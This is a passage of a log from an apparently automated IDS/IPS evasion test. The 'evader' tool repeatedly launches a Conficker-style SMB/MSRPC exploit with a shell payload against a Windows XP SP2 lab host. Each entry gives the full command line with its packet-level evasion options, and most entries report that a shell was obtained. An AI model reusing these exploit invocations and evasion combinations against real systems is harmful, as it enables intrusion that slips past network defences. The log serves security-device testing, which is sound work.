  5274. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5275. Info: Sending MSRPC request with exploit
  5276. Info: Shell found, attack succeeded
  5277. Info: Shell closed
  5278. 0: Success.
  5279. .
  5280. 8981 runs averaging 1.92 runs / second ; progress: 4686/43200..............
  5281. 8995 runs averaging 1.92 runs / second ; progress: 4691/43200.....Pid 7992 timed out - killed
  5282. 2015-06-08 00:37:44 INFO
  5283. Timed out (10.62.90.112):
  5284. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26909 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CqYGL7dhLx0 --evasion=[smb_connect,smb_opentree]tcp_chaff,"50%","chksum|outofwindow|shorthdr","zero" --evasion=[msrpc_req,end]tcp_paws,"1","6","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5285. Info: Using random seed CqYGL7dhLx0
  5286. The following evasions are applied from stage smb_connect to smb_opentree:
  5287. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5288. * Invalid TCP checksum.
  5289. * An out-of-window sequence number.
  5290. * TCP header shorter than 20 bytes
  5291. * Duplicate packet has 0x00 bytes as payload
  5292. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5293. - Add a random alphaurgent data byte to every 2 TCP segment.
  5294. The following evasions are applied from stage msrpc_req to end:
  5295. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
  5296.  
  5297. Info: NetBIOS connection 10.62.90.112:26909 -> 10.35.1.207:445
  5298. Terminated
  5299. .....
  5300. 9006 runs averaging 1.92 runs / second ; progress: 4696/43200..................
  5301. 9024 runs averaging 1.92 runs / second ; progress: 4701/43200.....2015-06-08 00:37:52 INFO
  5302. Success. (10.62.90.117):
  5303. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65431 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OeNPvjc5Qpo --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"75%","inc","random_alpha" --evasion=[msrpc_req,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  5304. Info: Using random seed OeNPvjc5Qpo
  5305. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5306. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  5307. The duplicate packet has random alphabetic bytes as payload
  5308. The following evasions are applied from stage msrpc_req to end:
  5309. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  5310.  
  5311. Info: NetBIOS connection 10.62.90.117:65431 -> 10.35.1.207:445
  5312. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5313. Info: Sending MSRPC request with exploit
  5314. Info: Shell found, attack succeeded
  5315. Info: CommandShell::SendCommand() - Failed to send string
  5316. Info: Command shell connection reset.
  5317. Info: Shell closed
  5318. 0: Success.
  5319. .....2015-06-08 00:37:54 INFO
  5320. Success. (10.62.90.112):
  5321. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18113 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5emIDQWoFM4 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","alphanum" --evasion=[smb_openpipe,end]tcp_paws,"25%","234116151","random" --verifydelay=1000 --payload=shell
  5322. Info: Using random seed 5emIDQWoFM7
  5323. The following evasions are applied from stage smb_connect to end:
  5324. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  5325. The following evasions are applied from stage smb_openpipe to end:
  5326. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 234116151> and has random bytes as payload
  5327.  
  5328. Info: NetBIOS connection 10.62.90.112:18113 -> 10.35.1.207:445
  5329. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5330. Info: Sending MSRPC request with exploit
  5331. Info: Shell found, attack succeeded
  5332. Info: Shell closed
  5333. 0: Success.
  5334. ........
  5335. 9044 runs averaging 1.92 runs / second ; progress: 4706/43200.......................
  5336. 9067 runs averaging 1.92 runs / second ; progress: 4711/43200.................
  5337. 9084 runs averaging 1.93 runs / second ; progress: 4716/43200..
  5338. 9086 runs averaging 1.92 runs / second ; progress: 4721/43200
  5339. 9086 runs averaging 1.92 runs / second ; progress: 4726/43200...........
  5340. 9097 runs averaging 1.92 runs / second ; progress: 4731/43200...............
  5341. 9112 runs averaging 1.92 runs / second ; progress: 4736/43200......
  5342. 9118 runs averaging 1.92 runs / second ; progress: 4741/43200......
  5343. 9124 runs averaging 1.92 runs / second ; progress: 4746/43200........
  5344. 9132 runs averaging 1.92 runs / second ; progress: 4751/43200..........
  5345. 9142 runs averaging 1.92 runs / second ; progress: 4756/43200....
  5346. 9146 runs averaging 1.92 runs / second ; progress: 4761/43200.2015-06-08 00:38:54 INFO
  5347. Success. (10.62.90.110):
  5348. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17243 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=mBAIsd7uGQ8 --evasion=[smb_openpipe,end]smb_decoytrees,"7","1","3","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"6","new","random_alphanum" --verifydelay=1000 --payload=shell
  5349. Info: Using random seed mBAIsd7uGQ+
  5350. The following evasions are applied from stage smb_connect to msrpc_bind:
  5351. - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  5352. The following evasions are applied from stage smb_openpipe to end:
  5353. - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  5354.  
  5355. Info: NetBIOS connection 10.62.90.110:17243 -> 10.35.1.207:445
  5356. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5357. Info: Sending MSRPC request with exploit
  5358. Info: Shell found, attack succeeded
  5359. Info: Shell closed
  5360. 0: Success.
  5361. .
  5362. 9149 runs averaging 1.92 runs / second ; progress: 4766/43200.........
  5363. 9158 runs averaging 1.92 runs / second ; progress: 4771/43200..........
  5364. 9168 runs averaging 1.92 runs / second ; progress: 4776/43200...............
  5365. 9183 runs averaging 1.92 runs / second ; progress: 4782/43200...2015-06-08 00:39:16 INFO
  5366. Success. (10.62.90.117):
  5367. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30782 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=0FzzJYfIw6U --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","2048","random_alphanum" --evasion=[start,end]tcp_paws,"5","4","random" --verifydelay=1000 --payload=shell
  5368. Info: Using random seed 0FzzJYfIw6X
  5369. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5370. The following evasions are applied from stage smb_opentree to msrpc_req:
  5371. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2048 random alphanumeric bytes.
  5372.  
  5373. Info: NetBIOS connection 10.62.90.117:30782 -> 10.35.1.207:445
  5374. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5375. Info: Sending MSRPC request with exploit
  5376. Info: Shell found, attack succeeded
  5377. Info: Shell closed
  5378. 0: Success.
  5379.  
  5380. 9187 runs averaging 1.92 runs / second ; progress: 4787/43200.....
  5381. 9192 runs averaging 1.92 runs / second ; progress: 4792/43200...
  5382. 9195 runs averaging 1.92 runs / second ; progress: 4797/43200.....
  5383. 9200 runs averaging 1.92 runs / second ; progress: 4802/43200.
  5384. 9201 runs averaging 1.91 runs / second ; progress: 4807/432002015-06-08 00:39:37 INFO
  5385. Success. (10.62.90.117):
  5386. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41485 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SM6cPJn5+OQ --evasion=[msrpc_bind,end]tcp_paws,"1","9","random" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5387. Info: Using random seed SM6cPJn5+OR
  5388. The following evasions are applied from stage msrpc_bind to end:
  5389. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
  5390. - TCP timestamps echo reply value is sent in the wrong endianness
  5391.  
  5392. Info: NetBIOS connection 10.62.90.117:41485 -> 10.35.1.207:445
  5393. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5394. Info: Sending MSRPC request with exploit
  5395. Info: Shell found, attack succeeded
  5396. Info: Shell closed
  5397. 0: Success.
  5398. ...
  5399. 9205 runs averaging 1.91 runs / second ; progress: 4812/43200.........
  5400. 9214 runs averaging 1.91 runs / second ; progress: 4817/43200........2015-06-08 00:39:51 INFO
  5401. Success. (10.62.90.112):
  5402. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43229 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=fd/3gZhjdgM --evasion=[smb_opentree,end]tcp_paws,"75%","240370247","shuffle" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5403. Info: Using random seed fd/3gZhjdgN
  5404. The following evasions are applied from stage smb_opentree to end:
  5405. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240370247> and has shuffled original payload
  5406. - TCP timestamps echo reply value is sent in the wrong endianness
  5407.  
  5408. Info: NetBIOS connection 10.62.90.112:43229 -> 10.35.1.207:445
  5409. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5410. Info: Sending MSRPC request with exploit
  5411. Info: Shell found, attack succeeded
  5412. Info: CommandShell::SendCommand() - Failed to send string
  5413. Info: Command shell connection reset.
  5414. Info: Shell closed
  5415. 0: Success.
  5416. ....
  5417. 9227 runs averaging 1.91 runs / second ; progress: 4822/43200......
  5418. 9233 runs averaging 1.91 runs / second ; progress: 4827/43200.
  5419. 9234 runs averaging 1.91 runs / second ; progress: 4832/43200
  5420. 9234 runs averaging 1.91 runs / second ; progress: 4837/43200.....
  5421. 9239 runs averaging 1.91 runs / second ; progress: 4842/43200.......
  5422. 9246 runs averaging 1.91 runs / second ; progress: 4847/43200
  5423. 9246 runs averaging 1.91 runs / second ; progress: 4852/43200
  5424. 9246 runs averaging 1.90 runs / second ; progress: 4857/43200.2015-06-08 00:40:30 INFO
  5425. Success. (10.62.90.112):
  5426. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25007 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4t8G7ohmFd8 --evasion=[smb_connect,msrpc_bind]smb_chaff,"13","write_flag","msrpc" --evasion=[smb_openpipe,end]smb_decoytrees,"4","4","2","random_msrpcreq" --verifydelay=1000 --payload=shell
  5427. Info: Using random seed 4t8G7ohmFd/
  5428. The following evasions are applied from stage smb_connect to msrpc_bind:
  5429. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5430. The following evasions are applied from stage smb_openpipe to end:
  5431. - Before normal SMB writes, 4 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  5432.  
  5433. Info: NetBIOS connection 10.62.90.112:25007 -> 10.35.1.207:445
  5434. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5435. Info: Sending MSRPC request with exploit
  5436. Info: Shell found, attack succeeded
  5437. Info: Shell closed
  5438. 0: Success.
  5439. ...
  5440. 9251 runs averaging 1.90 runs / second ; progress: 4862/43200...........
  5441. 9262 runs averaging 1.90 runs / second ; progress: 4867/43200.....
  5442. 9267 runs averaging 1.90 runs / second ; progress: 4872/43200.Pid 10886 timed out - killed
  5443. 2015-06-08 00:40:43 INFO
  5444. Timed out (10.62.90.111):
  5445. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14403 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=ozOEXUfZ3/w --evasion=[smb_openpipe,end]smb_chaff,"3","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5446. Info: Using random seed ozOEXUfZ3/y
  5447. The following evasions are applied from stage smb_opentree to msrpc_req:
  5448. - Add a random alphaurgent data byte to every 2 TCP segment.
  5449. The following evasions are applied from stage smb_openpipe to end:
  5450. - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5451.  
  5452. Info: NetBIOS connection 10.62.90.111:14403 -> 10.35.1.207:445
  5453. Terminated
  5454. ....
  5455. 9273 runs averaging 1.90 runs / second ; progress: 4877/43200......
  5456. 9279 runs averaging 1.90 runs / second ; progress: 4882/432002015-06-08 00:40:52 INFO
  5457. Success. (10.62.90.112):
  5458. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38297 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=rrkcEtoysN8 --evasion=[smb_connect,smb_openpipe]ipv4_frag,"56" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
  5459. Info: Using random seed rrkcEtoysN+
  5460. The following evasions are applied from stage smb_connect to smb_openpipe:
  5461. - IPv4 fragments with at most 56 bytes per fragment
  5462. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5463. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
  5464.  
  5465. Info: NetBIOS connection 10.62.90.112:38297 -> 10.35.1.207:445
  5466. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5467. Info: Sending MSRPC request with exploit
  5468. Info: Shell found, attack succeeded
  5469. Info: Shell closed
  5470. 0: Success.
  5471. .Pid 11141 timed out - killed
  5472. 2015-06-08 00:40:53 INFO
  5473. Timed out (10.62.90.119):
  5474. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64976 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=nm6gz4exUZ4 --evasion=[start,netbios_connect]tcp_paws,"75%","268435455","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  5475. Info: Using random seed nm6gz4exUZ6
  5476. The following evasions are applied from stage start to netbios_connect:
  5477. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  5478. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5479. - Add a random urgent data byte to every 1 TCP segment.
  5480.  
  5481. Info: NetBIOS connection 10.62.90.119:64976 -> 10.35.1.207:445
  5482. Terminated
  5483. .......
  5484. 9289 runs averaging 1.90 runs / second ; progress: 4887/43200.........
  5485. 9298 runs averaging 1.90 runs / second ; progress: 4892/43200...
  5486. 9301 runs averaging 1.90 runs / second ; progress: 4897/43200.....
  5487. 9306 runs averaging 1.90 runs / second ; progress: 4902/43200.....
  5488. 9311 runs averaging 1.90 runs / second ; progress: 4907/43200.........
  5489. 9320 runs averaging 1.90 runs / second ; progress: 4912/43200.2015-06-08 00:41:23 INFO
  5490. Success. (10.62.90.112):
  5491. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39207 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=3I+N5IlyQj0 --evasion=[smb_opentree,end]smb_writeandxpad,"1024","random_alphanum" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","shuffle30" --verifydelay=1000 --payload=shell
  5492. Info: Using random seed 3I+N5IlyQj3
  5493. The following evasions are applied from stage smb_opentree to end:
  5494. - 1024 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  5495. The following evasions are applied from stage msrpc_req to end:
  5496. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has 30 bytes of original payload, then shuffled original payload
  5497.  
  5498. Info: NetBIOS connection 10.62.90.112:39207 -> 10.35.1.207:445
  5499. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5500. Info: Sending MSRPC request with exploit
  5501. Info: Shell found, attack succeeded
  5502. Info: Shell closed
  5503. 0: Success.
  5504. Pid 11571 timed out - killed
  5505. 2015-06-08 00:41:23 INFO
  5506. Timed out (10.62.90.118):
  5507. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32339 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=jX8rcN/h25o --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"16" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  5508. Info: Using random seed jX8rcN/h25q
  5509. The following evasions are applied from stage smb_opentree to end:
  5510. - Add a zero urgent data byte to every 2 TCP segment.
  5511. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5512. - IPv4 fragments with at most 16 bytes per fragment
  5513.  
  5514. Info: NetBIOS connection 10.62.90.118:32339 -> 10.35.1.207:445
  5515. Terminated
  5516. ..........
  5517. 9333 runs averaging 1.90 runs / second ; progress: 4917/43200.........2015-06-08 00:41:30 INFO
  5518. Success. (10.62.90.119):
  5519. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34803 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=tmDsj+XmrZ8 --evasion=[netbios_connect,end]ipv4_frag,"632" --evasion=[msrpc_req,end]tcp_paws,"50%","10","shuffle30" --evasion=[msrpc_req,end]tcp_segvar,"24730","31998" --verifydelay=1000 --payload=shell
  5520. Info: Using random seed tmDsj+XmrZ+
  5521. The following evasions are applied from stage netbios_connect to end:
  5522. - IPv4 fragments with at most 632 bytes per fragment
  5523. The following evasions are applied from stage msrpc_req to end:
  5524. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 30 bytes of original payload, then shuffled original payload
  5525. - TCP packets are segmented to contain between 24730 and 31998 bytes of payload.
  5526.  
  5527. Info: NetBIOS connection 10.62.90.119:34803 -> 10.35.1.207:445
  5528. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5529. Info: Sending MSRPC request with exploit
  5530. Info: Shell found, attack succeeded
  5531. Info: Command shell connection reset.
  5532. Info: CommandShell::SendCommand() - Failed to send string
  5533. Info: Shell closed
  5534. 0: Success.
  5535. ..
  5536. 9345 runs averaging 1.90 runs / second ; progress: 4922/43200..........
  5537. 9355 runs averaging 1.90 runs / second ; progress: 4927/43200..........
  5538. 9365 runs averaging 1.90 runs / second ; progress: 4932/43200...............
  5539. 9380 runs averaging 1.90 runs / second ; progress: 4937/43200.........
  5540. 9389 runs averaging 1.90 runs / second ; progress: 4942/43200...........
  5541. 9400 runs averaging 1.90 runs / second ; progress: 4947/43200...........
  5542. 9411 runs averaging 1.90 runs / second ; progress: 4952/43200.........2015-06-08 00:42:05 INFO
  5543. Success. (10.62.90.118):
  5544. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11897 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=1Pcgp2wrgcE --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"456" --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"6","6","2","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","216017382","shuffle" --verifydelay=1000 --payload=shell
  5545. Info: Using random seed 1Pcgp2wrgcH
  5546. The following evasions are applied from stage smb_connect to msrpc_req:
  5547. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 216017382> and has shuffled original payload
  5548. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5549. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2 random alphanumeric bytes.
  5550. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5551. - IPv4 fragments with at most 456 bytes per fragment
  5552.  
  5553. Info: NetBIOS connection 10.62.90.118:11897 -> 10.35.1.207:445
  5554. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5555. Info: Sending MSRPC request with exploit
  5556. Info: Shell found, attack succeeded
  5557. Info: Command shell connection reset.
  5558. Info: CommandShell::SendCommand() - Failed to send string
  5559. Info: Shell closed
  5560. 0: Success.
  5561. ........
  5562. 9429 runs averaging 1.90 runs / second ; progress: 4957/43200.............
  5563. 9442 runs averaging 1.90 runs / second ; progress: 4962/43200......2015-06-08 00:42:15 INFO
  5564. Success. (10.62.90.112):
  5565. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25532 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=biR6QHYn0fA --evasion=[smb_connect,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_paws,"75%","57019005","alpharandomized" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5566. Info: Using random seed biR6QHYn0fB
  5567. The following evasions are applied from stage smb_connect to end:
  5568. - IPv4 fragments with at most 56 bytes per fragment
  5569. The following evasions are applied from stage msrpc_bind to end:
  5570. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 57019005> and has original payload with alphabetic bytes randomized
  5571. - TCP timestamps echo reply value is sent in the wrong endianness
  5572.  
  5573. Info: NetBIOS connection 10.62.90.112:25532 -> 10.35.1.207:445
  5574. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5575. Info: Sending MSRPC request with exploit
  5576. Info: Shell found, attack succeeded
  5577. Info: CommandShell::SendCommand() - Failed to send string
  5578. Info: Command shell connection reset.
  5579. Info: Shell closed
  5580. 0: Success.
  5581. 2015-06-08 00:42:17 INFO
  5582. Success. (10.62.90.112):
  5583. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53786 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=6PvoPo84oSk --evasion=[start,smb_connect]tcp_chaff,"2","chksum|nullchksum|nullflag","unmodified" --evasion=[netbios_connect,end]tcp_paws,"75%","208945","alpharandomized" --evasion=[netbios_connect,smb_openpipe]tcp_segvar,"63557","65534" --verifydelay=1000 --payload=shell
  5584. Info: Using random seed 6PvoPo84oSn
  5585. The following evasions are applied from stage start to smb_connect:
  5586.  
  5587. The following evasions are applied from stage netbios_connect to end:
  5588. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208945> and has original payload with alphabetic bytes randomized
  5589. The following evasions are applied from stage netbios_connect to smb_openpipe:
  5590. - TCP packets are segmented to contain between 63557 and 65534 bytes of payload.
  5591.  
  5592. Info: NetBIOS connection 10.62.90.112:53786 -> 10.35.1.207:445
  5593. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5594. Info: Sending MSRPC request with exploit
  5595. Info: Shell found, attack succeeded
  5596. Info: CommandShell::SendCommand() - Failed to send string
  5597. Info: Command shell connection reset.
  5598. Info: Shell closed
  5599. 0: Success.
  5600.  
  5601. 9450 runs averaging 1.90 runs / second ; progress: 4967/43200..
  5602. 9452 runs averaging 1.90 runs / second ; progress: 4972/43200
  5603. 9452 runs averaging 1.90 runs / second ; progress: 4977/43200Pid 12388 timed out - killed
  5604. 2015-06-08 00:42:29 INFO
  5605. Timed out (10.62.90.116):
  5606. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25941 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HYzAAspzemw --evasion=[smb_opentree,smb_openpipe]tcp_paws,"13","268435455","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  5607. Info: Using random seed HYzAAspzemw
  5608. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5609. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
  5610. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5611. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  5612.  
  5613. Info: NetBIOS connection 10.62.90.116:25941 -> 10.35.1.207:445
  5614. Terminated
  5615. ..2015-06-08 00:42:31 INFO
  5616. Success. (10.62.90.117):
  5617. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37295 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=f4Rayn2XGBc --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_vax","byte3_zero","byte4_zero" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","6","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"3","4","random" --verifydelay=1000 --payload=shell
  5618. Info: Using random seed f4Rayn2XGBd
  5619. The following evasions are applied from stage netbios_connect to smb_opentree:
  5620. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  5621. The following evasions are applied from stage msrpc_bind to end:
  5622. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5623. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5624. - MSRPC NDR flag is modified:
  5625. * EBCDIC character encoding
  5626. * VAX floating point value encoding
  5627. * Reserved 3rd byte is set to zero
  5628. * Reserved 4th byte is set to zero
  5629.  
  5630.  
  5631. Info: NetBIOS connection 10.62.90.117:37295 -> 10.35.1.207:445
  5632. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5633. Info: Sending MSRPC request with exploit
  5634. Info: Shell found, attack succeeded
  5635. Info: Shell closed
  5636. 0: Success.
  5637. ...
  5638. 9459 runs averaging 1.90 runs / second ; progress: 4982/43200...............
  5639. 9474 runs averaging 1.90 runs / second ; progress: 4988/43200..Pid 12663 timed out - killed
  5640. 2015-06-08 00:42:38 INFO
  5641. Timed out (10.62.90.115):
  5642. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19557 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=MlzU34gI/UA --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"72" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  5643. Info: Using random seed MlzU34gI/UA
  5644. The following evasions are applied from stage start to netbios_connect:
  5645. - IPv4 fragments are sent in correct order except that the first fragment comes last
  5646. The following evasions are applied from stage smb_openpipe to end:
  5647. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  5648. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5649. - IPv4 fragments with at most 72 bytes per fragment
  5650.  
  5651. Info: NetBIOS connection 10.62.90.115:19557 -> 10.35.1.207:445
  5652. Terminated
  5653. ....
  5654. 9481 runs averaging 1.90 runs / second ; progress: 4993/43200
  5655. 9481 runs averaging 1.90 runs / second ; progress: 4998/43200
